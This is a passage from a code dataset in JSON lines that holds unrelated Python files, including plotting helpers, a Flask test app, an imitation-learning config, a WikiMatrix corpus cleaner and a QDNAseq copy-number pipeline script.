If no axes\n are provided, the first 3 columns of the input DataFrame will automatically be used.\n :param data: 3D data in a pandas DataFrame.\n :param show: Set to display graph.\n \"\"\"\n\n if axes == None:\n axes = data.columns.tolist()\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n x = data[axes[0]]\n y = data[axes[1]]\n z = data[axes[2]]\n ax.scatter(x, y, z, c=z)\n ax.set_xlabel(axes[0])\n ax.set_ylabel(axes[1])\n ax.set_zlabel(axes[2])\n\n if show:\n plt.show()\n","repo_name":"elevans/tooled","sub_path":"src/tooled/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74316357868","text":"from judgeUtil import chairSynonymsEn\r\nfrom judgeUtil import tableSynonymsEn\r\nfrom judgeUtil import indexToWord\r\nfrom judgeUtil import obtainAndEntities\r\nfrom judgeUtil import printEntities\r\nfrom judgeUtil import extractEntities, extractPeopleNumber\r\nfrom util import convertWordsToNumber\r\nimport math\r\n\r\nlowestChairCountPerTable = 4\r\ncircleSynonymsEn = [\"circle\", \"lap\", \"ring\"]\r\ngroupSynonymsEn = [\"group\", \"set\"]\r\ndefaultTableCount = 5\r\n\r\nclass JudgeBanquet:\r\n def __init__(self, sentences, s_ch, s_en, conjAnd, posTag, relationships, commands):\r\n self.commands = commands\r\n self.posTag = posTag\r\n self.relationships = relationships\r\n self.wordIndex = indexToWord(s_en)\r\n self.entities, self.noEntities = extractEntities(sentences, self.wordIndex)\r\n self.andEntities = self._extractConjAnd(conjAnd)\r\n self._modifyEntities()\r\n self.s_ch = s_ch\r\n self.s_en = s_en\r\n self.people_number = extractPeopleNumber(self.wordIndex, self.entities, self.relationships)\r\n\r\n def process(self):\r\n table_number = self.extractTableNumber()\r\n half_circle_table = self.whetherEachTableHalfCircleChair()\r\n if self.people_number <= 0:\r\n self.people_number = self.calculatePeopleNumber(table_number,half_circle_table)\r\n return table_number, half_circle_table, self.people_number\r\n\r\n def calculatePeopleNumber(self, table_number, half_circle_table):\r\n if table_number > 0:\r\n if half_circle_table:\r\n return table_number * 3\r\n else:\r\n return table_number * 6\r\n else:\r\n return 25\r\n\r\n def _extractConjAnd(self, conjAnd):\r\n andEntites = obtainAndEntities(conjAnd, self.entities)\r\n print(andEntites)\r\n return andEntites\r\n\r\n def _modifyEntities(self):\r\n # TODO 六张桌子和椅子\r\n printEntities(self.entities)\r\n\r\n def extractTableNumber(self):\r\n tableCount = -1\r\n chairCount = -1\r\n for k in self.entities.keys():\r\n for table in tableSynonymsEn + groupSynonymsEn:\r\n if table in k:\r\n if \"count\" in self.entities[k].keys():\r\n try:\r\n count = convertWordsToNumber(self.entities[k][\"count\"])\r\n if count > 1 and count > tableCount:\r\n tableCount = count\r\n except Exception as e:\r\n pass\r\n for chair in chairSynonymsEn:\r\n if chair in k:\r\n if \"count\" in self.entities[k].keys():\r\n try:\r\n count = convertWordsToNumber(self.entities[k][\"count\"])\r\n if count > 1 and count > chairCount:\r\n chairCount = count\r\n except Exception as e:\r\n pass\r\n if tableCount != -1:\r\n if chairCount != -1:\r\n if self.people_number <= 0 and chairCount < 20:\r\n self.people_number = tableCount * chairCount\r\n return tableCount\r\n if chairCount != -1 and chairCount >= lowestChairCountPerTable and chairCount < 20:\r\n print(\"chairCount:\",chairCount)\r\n self.people_number = defaultTableCount * 
chairCount\r\n            return defaultTableCount\r\n        return -1\r\n\r\n    def whetherEachTableHalfCircleChair(self):\r\n        for k in self.entities.keys():\r\n            for circle in circleSynonymsEn:\r\n                if circle in k:\r\n                    if \"half\" in self.entities[k][\"attributes\"] or \"half\" in self.entities[k][\"determiners\"]:\r\n                        for chair in chairSynonymsEn:\r\n                            if (\"of:\"+chair) in self.entities[k][\"relationships\"]:\r\n                                return True\r\n        # False just means it was not mentioned, not a definite no; fall back to the default\r\n        return False\r\n\r\n# if __name__==\"__main__\":\r\n#     # sentences = [\"由若干组桌椅组成,12张椅子围着一个桌子\",\r\n#     #              \"布局由好几个桌椅围成的小圈组成,每个小圈由6张桌椅组成\",\r\n#     #              \"好几组环形布局的桌椅,每组6个座位\",\r\n#     #              \"若干张梯形课桌拼成六边形,每个边有一把椅子,大房间内有多个六边形\",\r\n#     #              \"每六个桌子成一组,围成一个六边形,房间内多组桌子错落排放,每组桌子的一条边上放置一张椅子\",\r\n#     #              \"整个会议室分为五组桌椅,每组桌椅是由梯形单人桌围城的六边形大桌,周围有六把椅子\",\r\n#     #              \"四张桌子纵向面向屏幕,摆放两行,每行两张。每张桌子两侧各三张椅子。\",\r\n#     #              \"四张椅子围绕着一张小桌子,一共有多组这样的桌椅组合布满整个房间。\",\r\n#     #              \"五列圆桌,每个圆桌围绕半圈椅子,椅子都朝向正前方。\",\r\n#     #              \"几十张圆桌均匀分布,每张桌子上10个座位\",\r\n#     #              \"房间内有很多圆桌,每张圆桌周围放约8张椅子\",\r\n#     #              \"有很多圆形的桌子,每个桌子周围带有十把椅子\",\r\n#     #              \"有五张长方形桌子,彼此分开,不靠近。每个桌子四周围绕着五个椅子。\",\r\n#     #              \"四组长桌椅分布在会议室的两侧,每侧各两组,每张长桌对应五把椅子\",\r\n#     #              \"以小桌形式,一张桌子周围配置六个椅子\"]\r\n#     sentences = [\"整个会议室分为五组桌椅,每组桌椅是由梯形单人桌围城的六边形大桌,周围有六把椅子\",\r\n#                  \"四组长桌椅分布在会议室的两侧,每侧各两组,每张长桌对应五把椅子\"]\r\n#     for s in sentences:\r\n#         sentences, s_ch, s_en, conjAnd, posTag = processInputEnglish(s)\r\n#         judge = JudgeBanquet(sentences, s_ch, s_en, conjAnd, 30)\r\n#         print(judge.extractTableNumber())\r\n#         print(judge.whetherEachTableHalfCircleChair())\r\n#         print(\"=========================\")\r\n\r\n","repo_name":"monianshouhou/3DMeetingRoomGeneration","sub_path":"judgeBanquet.py","file_name":"judgeBanquet.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"40808880006","text":"import json\r\n# from pprint import pprint\r\nf=open(\"task4s.json\",\"r\")\r\nmovie_list=json.load(f)\r\ng_movie,top_movie=0,[]\r\ndef scrape_movie_details():\r\n    g_movie=0\r\n    for i in movie_list:\r\n        if g_movie==10: # check before appending so exactly the top 10 are kept (appending first kept an 11th movie)\r\n            break\r\n        top_movie.append(i)\r\n        g_movie+=1\r\n    file=open(\"task5s.json\",\"w\")\r\n    json.dump(top_movie,file,indent=4)\r\n    file.close()\r\n    return top_movie\r\nprint(scrape_movie_details())","repo_name":"pawankumar2255/IMDB-Scrap","sub_path":"imdb5.py","file_name":"imdb5.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"74035643948","text":"\"\"\"Configuration settings for train_dagger, training DAgger from synthetic demos.\"\"\"\n\nimport sacred\nimport torch as th\n\nfrom imitation.scripts.ingredients import demonstrations as demos_common\nfrom imitation.scripts.ingredients import environment, expert\nfrom imitation.scripts.ingredients import logging as logging_ingredient\nfrom imitation.scripts.ingredients import train\n\ntrain_imitation_ex = sacred.Experiment(\n    \"train_imitation\",\n    ingredients=[\n        logging_ingredient.logging_ingredient,\n        demos_common.demonstrations_ingredient,\n        train.train_ingredient,\n        expert.expert_ingredient,\n        environment.environment_ingredient,\n    ],\n)\n\n\n@train_imitation_ex.config\ndef config():\n    bc_kwargs = dict(\n        batch_size=32,\n        l2_weight=3e-5,  # L2 regularization weight\n        optimizer_cls=th.optim.Adam,\n        optimizer_kwargs=dict(\n            lr=4e-4,\n        ),\n    )\n    bc_train_kwargs = dict(\n        n_epochs=None,  # Number of BC epochs per DAgger training round\n        n_batches=None,  # Number of BC batches per DAgger training round\n        log_interval=500,  # Number of updates between 
Tensorboard/stdout logs\n    )\n    dagger = dict(\n        use_offline_rollouts=False,  # warm-start policy with BC from offline demos\n        total_timesteps=1e5,\n    )\n    agent_path = None  # Path to load agent from, optional.\n\n\n@train_imitation_ex.named_config\ndef mountain_car():\n    environment = dict(gym_id=\"MountainCar-v0\")\n    bc_kwargs = dict(l2_weight=0.0)\n    dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef seals_mountain_car():\n    environment = dict(gym_id=\"seals/MountainCar-v0\")\n    bc_kwargs = dict(l2_weight=0.0)\n    dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef cartpole():\n    environment = dict(gym_id=\"CartPole-v1\")\n    dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef seals_cartpole():\n    environment = dict(gym_id=\"seals/CartPole-v0\")\n    dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef pendulum():\n    environment = dict(gym_id=\"Pendulum-v1\")\n\n\n@train_imitation_ex.named_config\ndef ant():\n    environment = dict(gym_id=\"Ant-v2\")\n\n\n@train_imitation_ex.named_config\ndef seals_ant():\n    environment = dict(gym_id=\"seals/Ant-v0\")\n\n\n@train_imitation_ex.named_config\ndef half_cheetah():\n    environment = dict(gym_id=\"HalfCheetah-v2\")\n    bc_kwargs = dict(l2_weight=0.0)\n    dagger = dict(total_timesteps=60000)\n\n\n@train_imitation_ex.named_config\ndef seals_half_cheetah():\n    environment = dict(gym_id=\"seals/HalfCheetah-v0\")\n    bc_kwargs = dict(l2_weight=0.0)\n    dagger = dict(total_timesteps=60000)\n\n\n@train_imitation_ex.named_config\ndef humanoid():\n    environment = dict(gym_id=\"Humanoid-v2\")\n\n\n@train_imitation_ex.named_config\ndef seals_humanoid():\n    environment = dict(gym_id=\"seals/Humanoid-v0\")\n\n\n@train_imitation_ex.named_config\ndef fast():\n    dagger = dict(total_timesteps=50)\n    bc_train_kwargs = dict(n_batches=50)\n","repo_name":"frapercan/imitation-learning","sub_path":"src/imitation/scripts/config/train_imitation.py","file_name":"train_imitation.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"17552729703","text":"# Binary to decimal\n# Given a binary number as an integer N, convert it into decimal and print.\n\nn = int(input())\n\npv = 0\n# c = 1\nans = 0\ntemp = n\nwhile(temp!=0):\n    d = temp%10 # read the lowest remaining digit from temp; n%10 would return the same digit on every pass\n    temp = int(temp/10)\n    c = 2**pv\n    ans = ans + (d*c)\n    pv+=1\n\nprint(ans) ","repo_name":"jaychovatiya4995/python_codingwithNinjas","sub_path":"More Loop/Binarytodecimal.py","file_name":"Binarytodecimal.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"8395574371","text":"import matplotlib\n\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom bokeh.plotting import figure\n\n\ndef matplotlib_multiple_axes_figures(total_plot_count=3, data=[1, 2, 3]):\n    \"\"\"Helper generator which create a figure containing up to `total_plot_count`\n    axes and optionally adds `data` to each axes in a permutation-style loop.\n    \"\"\"\n    for num_plots in range(1, total_plot_count + 1):\n        for permutation in range(2**num_plots):\n            has_data = [permutation & (1 << i) > 0 for i in range(num_plots)]\n            fig, ax = plt.subplots(num_plots)\n            if num_plots == 1:\n                if has_data[0]:\n                    ax.plot(data)\n            else:\n                for plot_id in range(num_plots):\n                    if has_data[plot_id]:\n                        ax[plot_id].plot(data)\n            yield fig\n            plt.close()\n\n\ndef matplotlib_with_image():\n    \"\"\"Create a 
matplotlib figure with an image\"\"\"\n fig, ax = plt.subplots(3)\n ax[0].plot([1, 2, 3])\n ax[1].imshow(np.random.rand(200, 200, 3))\n ax[2].plot([1, 2, 3])\n return fig\n\n\ndef matplotlib_without_image():\n \"\"\"Create a matplotlib figure without an image\"\"\"\n fig, ax = plt.subplots(2)\n ax[0].plot([1, 2, 3])\n ax[1].plot([1, 2, 3])\n return fig\n\n\ndef bokeh_plot():\n # from https://docs.bokeh.org/en/latest/docs/user_guide/quickstart.html\n # prepare some data\n x = [1, 2, 3, 4, 5]\n y = [6, 7, 2, 4, 5]\n\n # create a new plot with a title and axis labels\n p = figure(title=\"simple line example\", x_axis_label=\"x\", y_axis_label=\"y\")\n\n # add a line renderer with legend and line thickness\n p.line(x, y, legend_label=\"Temp.\", line_width=2)\n\n return p\n","repo_name":"wandb/wandb","sub_path":"tests/pytest_tests/unit_tests_old/utils/dummy_data.py","file_name":"dummy_data.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"26189284052","text":"import sys\nimport zipfile\nimport xml.etree.ElementTree as ET\nfrom html.parser import HTMLParser\n\nclass HtmlParser(HTMLParser):\n \"\"\"Parse urls.\"\"\"\n def __init__(self):\n HTMLParser.__init__(self)\n self.rem = '[]\\r\\n\\t 0123456789'\n self.body = False\n self.get_data = False\n self.noscript = True\n self.text = []\n\n def handle_starttag(self, tag, attrs):\n if tag == 'body':\n self.body = True\n if tag == 'script':\n self.noscript = False\n if tag == 'p':\n self.get_data = True\n\n def handle_endtag(self, tag):\n if tag == 'body':\n self.body = False\n if tag == 'script':\n self.noscript = True\n if tag == 'p':\n self.get_data = False\n\n def handle_data(self, data):\n if self.body and self.get_data and self.noscript and data.strip(self.rem):\n self.text.append(data)\n\ndef doc_reader(infile):\n \"\"\"Parse docx and odf files.\"\"\"\n if infile.endswith('.docx'):\n docid = 'word/document.xml'\n else:\n docid = 'content.xml'\n try:\n zfile = zipfile.ZipFile(infile)\n except:\n print('Sorry, can\\'t open {}.'.format(infile))\n return\n body = ET.fromstring(zfile.read(docid))\n text = '\\n'.join([et.text.strip() for et in body.iter() if et.text])\n return text\n","repo_name":"riverrun/drat","sub_path":"drat/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"20642899482","text":"\"\"\"\n Public key HEX\n\n\"\"\"\n\nfrom .public_key_base import PublicKeyBase, PUBLIC_KEY_STORE_TYPE_HEX\n\nAUTHENTICATION_TYPE_HEX = 'HexVerificationKey'\nPUBLIC_KEY_TYPE_HEX = 'PublicKeyHex'\n\n\nclass PublicKeyHex(PublicKeyBase):\n \"\"\"Encode key value using Hex\"\"\"\n\n def __init__(self, key_id, **kwargs):\n PublicKeyBase.__init__(self, key_id, **kwargs)\n self._type = PUBLIC_KEY_TYPE_HEX\n self._store_type = PUBLIC_KEY_STORE_TYPE_HEX\n\n def get_authentication_type(self):\n \"\"\"return the type of authentication supported by this class\"\"\"\n return AUTHENTICATION_TYPE_HEX\n","repo_name":"OutlierVentures/H2O","sub_path":"backend/squid_py/ddo/public_key_hex.py","file_name":"public_key_hex.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"23988086647","text":"from application.bbwrapper import session\nimport requests\nimport shutil\nimport json\nimport re\nimport os\n\n\nclass ProductInfo:\n def 
__init__(self, url=None, sku=None):\n        if sku is None and url is None:\n            raise ValueError(\n                \"Must provide either a product url or product sku\")\n        elif sku is None and url is not None:\n            self.sku = self.get_product_sku(url)\n        else:\n            self.url = url\n            self.sku = sku\n        # self.name = None\n        # self.price = None\n        # self.is_available = None\n        # self.image_url = None\n\n    def get_product_sku(self, url):\n        domain_regex = re.compile(r'skuId=(\\d{7})', re.IGNORECASE)\n        mo = domain_regex.search(url)\n        if mo:\n            return mo.groups()[0]\n        else:\n            raise ValueError(\n                \"Could not find the product SKU in the provided URL.\")\n\n    def set_primary_info(self):\n        path = f\"https://api.bestbuy.com/v1/products(sku={self.sku})?sort=salePrice.asc&show=salePrice,onlineAvailability,name,image,url&format=json\"\n        res = session.get(path)  # fetch outside the try block so res is always bound when the except runs\n        try:\n            self.price, self.is_available, self.name, self.image_url, self.page_url = res.json()[\"products\"][0].values()\n        except Exception:\n            raise requests.RequestException(res.status_code)\n\n    def save_product_image(self):\n        script_dir = os.path.dirname(os.path.realpath('__file__'))\n        rel_path = \"application/static/product_images\"\n        self.image_filename = f'{self.sku}.png'\n        abs_path = os.path.join(script_dir, rel_path, self.image_filename)\n\n        headers = {'User-agent': 'Mozilla/5.0'}\n        res = requests.get(self.image_url, headers=headers).content\n        with open(abs_path, 'wb') as f:\n            f.write(res)\n\n    def __repr__(self):\n        return self.name\n","repo_name":"cyreilv7/BestBuyPriceTracker","sub_path":"application/bbwrapper/ProductInfo.py","file_name":"ProductInfo.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"13087986064","text":"'''Implement table to store edge distance'''\nimport numpy as np\n\n\nclass NeighborTable:\n\n    def __init__(self, num_points):\n        self.tab = np.zeros((num_points, num_points, 2)) - 1  # np.zeros expects the shape as a single tuple\n        # store current nearest edge and its distance\n        self.current_nearest = ([-1, -1], -1)\n\n    def _check_edge(self, edge):\n        if not isinstance(edge, tuple):\n            raise TypeError('expected a tuple.')\n        if len(edge) != 2:\n            raise TypeError('expected 2 entries.')\n        if edge[0] > edge[1]:\n            return edge\n        return (edge[1], edge[0])\n\n    def get(self, edge):\n        edge = self._check_edge(edge)\n        return self.tab[edge[0], edge[1]]\n\n    def set(self, edge, dist, lb):\n        edge = self._check_edge(edge)\n        self.tab[edge[0], edge[1], 0] = dist\n        self.tab[edge[0], edge[1], 1] = lb\n","repo_name":"wagner-group/geoadex","sub_path":"lib/dist_tab.py","file_name":"dist_tab.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
{"seq_id":"5045999822","text":"\n\nfrom flask import current_app, g, redirect, render_template, request, session\nfrom healthcheck import HealthCheck\n\nfrom . 
import homepage_blueprint\n\nimport json\nfrom bson import json_util\n\nfrom test_lib.data.model.user import create_test_users, get_users\nfrom test_lib.flask import force_scheme\nfrom test_lib.flask.login import do_login\nfrom test_lib.util.dependency_statuses import flask_available, mongo_available\nfrom test_lib.util.files import list_dirs_files\n\nimport os, sys\n\n# relative to this file(!)\nPROJECT_ROOT = os.path.abspath(os.path.abspath(__file__)+'../../../../../')\n\n\n@homepage_blueprint.route('/')\ndef homepage():\n return render_template('homepage.html')\n \n\n@force_scheme('https')\n@homepage_blueprint.route('login', methods=['GET', 'POST'])\ndef login():\n\tcreate_test_users(request.db)\n\tif request.method=='POST':\n\t\tuser = do_login(\n\t\t\trequest.form.get('username'), \n\t\t\trequest.form.get('password')\n\t\t)\n\t\tif not user:\n\t\t\treturn json.dumps({'success': False})\n\t\treturn json.dumps({'success': True})\n\treturn render_template('login.html')\n\n\n@homepage_blueprint.route('logout', methods=['GET'])\ndef logout():\n\tsession.clear()\n\treturn redirect('/')\n\n\n@force_scheme('https')\n@homepage_blueprint.route('users', methods=['GET'])\ndef list_users():\n\tcity = request.args.get('city', None)\n\tordered_by = request.args.get('ordered_by', None)\n\tusers = get_users(request.db, city, '%s'%ordered_by)\n\treturn render_template(\n\t\t'users.html',\n\t\tusers=users,\n\t\tcity=city,\n\t\tordered_by=ordered_by\n\t)\n\n\n@force_scheme('https')\n@homepage_blueprint.route('files', methods=['GET', 'POST'])\ndef list_files():\n\tpath = str(request.form.get('path', '')) if request.method=='POST' \\\n\telse str(request.args.get('path', ''))\n\tfiles = []\n\tif path:\n\t\tif not path[0]=='/':\n\t\t\tpath = '/%s'%path\n\t\tfiles = list_dirs_files(path, PROJECT_ROOT)\n\t\tif not files:\n\t\t\tif request.method=='POST':\n\t\t\t\treturn json.dumps({'success':True, 'ret': 'No such folder or empty'})\n\t\t\t\tfiles = []\n\t\tif request.method=='POST':\n\t\t\treturn json.dumps({'success':True, 'ret':files})\n\treturn render_template(\n\t\t'list_files.html',\n\t\tret=files,\n\t\tfile_scope=PROJECT_ROOT\n\t)\n\n\n# set healthcheck URL\nfrom dotcom import app\nhealth = HealthCheck(app, \"/statuses\")\nhealth.add_check(mongo_available)\nhealth.add_check(flask_available)\n\n\n","repo_name":"ddilley/technicolor-test","sub_path":"dotcom/blueprints/homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20240927405","text":"from src.ballandhoop.videostream import VideoStream\nimport shutil\nimport os\nimport cv2\n\n\ndef savePictures(dir_name, amount: int = 10, fps: int = 60, resolution_no: int = 1, wb_gains=None):\n \"\"\"\n Saves multiple video like images with ascending file names in a given folder, starting with 0.png\n :param str dir_name: name of the (new) directory inside `storage/faker/`, directory will be cleared out at the start\n :param amount: amount of pictures taken\n :param fps: the framerate in which the video frames will be fetched\n :param resolution_no: the resolution number which will be used, see :py:property`VideoStream.resolutions`\n :param wb_gains: the gains for white balancing, see :py:class`VideoStream`\n :return:\n \"\"\"\n dir_base = \"storage/faker/\"\n dir_name = dir_base + dir_name + \"/\"\n if os.path.exists(dir_name):\n shutil.rmtree(dir_name)\n os.makedirs(dir_name)\n\n vid = 
VideoStream(resolution_no=int(resolution_no), framerate=int(fps), wb_gains=wb_gains, as_hsv=False)\n idx = 0\n buffer = []\n for frame in vid:\n buffer.append(frame)\n idx = idx + 1\n if idx > int(amount):\n break\n vid.close()\n print('Got ' + str(int(vid.fps.fps())) + \" fps in \" + str(vid.fps.elapsed()) + \"s\")\n for i, f in enumerate(buffer):\n # this function can be too slow for doing it inside the top loop (?)\n cv2.imwrite(dir_name + str(i) + '.png', f)\n","repo_name":"lukas-staab/ball-and-hoop","sub_path":"src/faker/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37841331025","text":"# Takes in either a folder name, or individual .en and .[src] files.\n# Performs the following:\n# 1. normalizes punctuation\n# 2. removes lines where the English text is non-ASCII\n# 3. (optional) finds the longest common substring (LCS) of en and src sentences, and remove those\n# where LCS ratio to sentence length is too high.\n# Outputs en_clean and src_clean files.\n\n\nimport argparse\nfrom difflib import SequenceMatcher\nfrom pathlib import Path\nfrom string import punctuation\n\nfrom download_wikimatrix import extract_l2\nimport normalize\n\nPUNCT = set(punctuation)\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--en', type=Path)\nparser.add_argument('--src', type=Path)\nparser.add_argument('--folder', type=Path, help='run on all .[src] & .en files in a folder')\nparser.add_argument('--lang_fam', type=Path, default=None)\nparser.add_argument('--lcs-thresh', type=float, default=0.0,\n help='If specified, filters out those pairs with LCS > threshold. '\n 'For dev/test, recommended to set to 0.8')\n\ndef clean_en(en, src, en_clean, src_clean, lf=None, lf_clean=None, lcs_thresh=0.0):\n normalizer = normalize.MosesPunctNormalizer()\n\n num_lines_orig = 0\n num_lines_clean = 0\n num_bad_ascii = 0\n num_bad_lcs = 0\n\n if lf and lf_clean:\n flf = lf.open('r')\n flfclean = lf_clean.open('w')\n\n with en.open('r') as fen, src.open('r') as fsrc, \\\n en_clean.open('w') as fenclean, src_clean.open('w') as fsrcclean:\n for line_en, line_src in zip(fen, fsrc):\n num_lines_orig += 1\n if (num_lines_orig % 1000) == 0:\n print(f'processing line {num_lines_orig}', end='\\r')\n\n line_src = normalizer.normalize(line_src)\n line_en = normalizer.normalize(line_en)\n if lf:\n line_lf = flf.readline()\n\n if not line_en.isascii():\n num_bad_ascii += 1\n continue\n\n if lcs_thresh > 0:\n match = SequenceMatcher(None, line_en, line_src, autojunk=False).find_longest_match(\n 0, len(line_en), 0, len(line_src))\n lcs = line_src[match.b: match.b + match.size]\n lcs_ratio = len(lcs) / min(len(line_en), len(line_src))\n if lcs_ratio > lcs_thresh:\n num_bad_lcs += 1\n continue\n\n fenclean.write(line_en + '\\n')\n fsrcclean.write(line_src + '\\n')\n\n if lf:\n flfclean.write(line_lf)\n\n num_lines_clean += 1\n\n if lf and lf_clean:\n flf.close()\n flfclean.close()\n\n return num_lines_orig, num_lines_clean, num_bad_ascii, num_bad_lcs\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n lf, lf_clean = args.lang_fam, None\n lcs_thresh = args.lcs_thresh\n\n if args.folder:\n contents = list(args.folder.glob('WikiMatrix.??-??.txt.??'))\n basenames = set(fname.name.rsplit('.', 2)[0] for fname in contents)\n srcs, ens = [], []\n for basename in basenames:\n l2 = extract_l2(basename)\n srcs.append(args.folder / f'{basename}.txt.{l2}')\n ens.append(args.folder / 
f'{basename}.txt.en')\n\n        out_folder = args.folder.parent / f'{args.folder.name}_clean'\n        out_folder.mkdir(exist_ok=True, parents=True)\n    else:\n        ens = [args.en]\n        srcs = [args.src]\n\n    if lf:\n        lf_clean = lf.parent / lf.name.replace('Matrix.', 'Matrix.clean2.')\n\n    for en, src in zip(ens, srcs):\n        if args.folder:\n            en_clean = out_folder / en.name\n            src_clean = out_folder / src.name\n        else:\n            en_clean = en.parent / en.name.replace('Matrix.', 'Matrix.clean.')\n            src_clean = src.parent / src.name.replace('Matrix.', 'Matrix.clean.')\n\n\n        print('cleaning...')\n        num_lines_orig, num_lines_clean, num_bad_ascii, num_bad_lcs = \\\n            clean_en(en, src, en_clean, src_clean, lf, lf_clean, lcs_thresh)\n        print(f'num lines originally: {num_lines_orig}')\n        print(f'num lines after cleaning: {num_lines_clean}')\n        print(f'removed non-ASCII: {num_bad_ascii}')\n        print(f'removed overlapping: {num_bad_lcs}')\n        print(f'saved to {en_clean} , {src_clean}')\n","repo_name":"manestay/EcXTra","sub_path":"src/zsmt/scripts/clean_wikimatrix.py","file_name":"clean_wikimatrix.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"4655199214","text":"#Email:fanyucai1@126.com\n#2019.3.20\n\nimport argparse\nimport os\nimport subprocess\nimport math\n\nqsub=\"/home/fanyucai/bin/qsub_sge.pl\"\n#download from:http://genome.ucsc.edu/cgi-bin/hgFileUi?db=hg19&g=wgEncodeMapability\nbigWigFile=\"/software/QDNAseq/wgEncodeCrgMapabilityAlign50mer.bigWig\"\nbigWigAverageOverBed=\"/software/ucsc-tools/bigWigAverageOverBed\"\n# build the blacklist with append: assigning by index into an empty list raises IndexError\nbacklist=[]\nbacklist.append(\"/software/QDNAseq/wgEncodeDacMapabilityConsensusExcludable.bed\")\nbacklist.append(\"/software/QDNAseq/wgEncodeDukeMapabilityRegionsExcludable.bed\")\nbin_file=\"/software/QDNAseq\"\nR=\"/software/R/R-v3.5.2/bin\"\n\nparser=argparse.ArgumentParser(\"\")\nparser.add_argument(\"--bam_dir\",help=\"directory contains bam file\",required=True)\nparser.add_argument(\"--bin\",help=\"bin size\",type=int,required=True,choices=[1,5,10,15,30,50,100,500,1000])\nparser.add_argument(\"-o\",\"--outdir\",help=\"output directory\",required=True)\nargs=parser.parse_args()\n\n# the script takes a single directory (--bam_dir), not a list of bam files\nargs.bam_dir=os.path.abspath(args.bam_dir)\nif not os.path.exists(args.outdir):\n    os.mkdir(args.outdir)\n#########################################Generating bin annotations\nshell=open(\"%s/QDNAseq.Rscript\" %(args.outdir),\"w\")\nshell.write(\"#!%s/Rscript\\n\" %(R))\nshell.write(\"library(QDNAseq)\\n\")\nshell.write(\"library(Biobase)\\n\")\nshell.write(\"library(BSgenome.Hsapiens.UCSC.hg19)\\n\")\nshell.write(\"bins <- getBinAnnotations(binSize=%s,path=\\'%s\\',genome=\\\"hg19\\\")\\n\" %(args.bin,bin_file))\nshell.write(\"readCounts=binReadCounts(bins, path=\\'%s\\')\\n\" %(args.bam_dir))\nshell.write(\"readCountsFiltered=applyFilters(readCounts,residual=TRUE, blacklist=TRUE)\\n\")\n#Calculating GC content and mappability\nshell.write(\"readCountsFiltered= estimateCorrection(readCountsFiltered)\\n\")\n#apply the correction for GC content and mappability\nshell.write(\"copyNumbers = correctBins(readCountsFiltered)\\n\")\n#median normalization\nshell.write(\"copyNumbersNormalized = normalizeBins(copyNumbers)\\n\")\nshell.write(\"copyNumbersSmooth =smoothOutlierBins(copyNumbersNormalized)\\n\")\nshell.write(\"exportBins(copyNumbersSmooth, file=\\\"%s/counts.txt\\\")\\n\" %(args.outdir))\nshell.close()\n#########################################\nsubprocess.check_call(\"%s/Rscript %s/QDNAseq.Rscript\" 
%(R,args.outdir),shell=True)\n#########################################\ninfile=open(\"%s/counts.txt\" %(args.outdir),\"r\")\noutfile=open(\"%s/counts_log2.txt\" %(args.outdir),\"w\")\ni=-1\nfor line in infile:\n    line = line.strip()\n    cols = line.split(\"\\t\")\n    i+=1\n    if i==0:\n        # the first line of counts.txt is the header row\n        outfile.write(\"%s\\t%s\\t%s\\tusebin\" % (cols[1],cols[2],cols[3]))\n        for j in range(4,len(cols)):  # separate index so the line counter i is not clobbered\n            outfile.write(\"\\t%s\" %(cols[j]))\n        outfile.write(\"\\n\")\n    else:\n        outfile.write(\"%s\\t%s\\t%s\\tTRUE\" % (cols[1], cols[2], cols[3]))\n        for j in range(4,len(cols)):\n            outfile.write(\"\\t%s\" %(cols[j]))\n        outfile.write(\"\\n\")\ninfile.close()\noutfile.close()\n","repo_name":"fanyucai1/script","sub_path":"QDNAseq.py","file_name":"QDNAseq.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
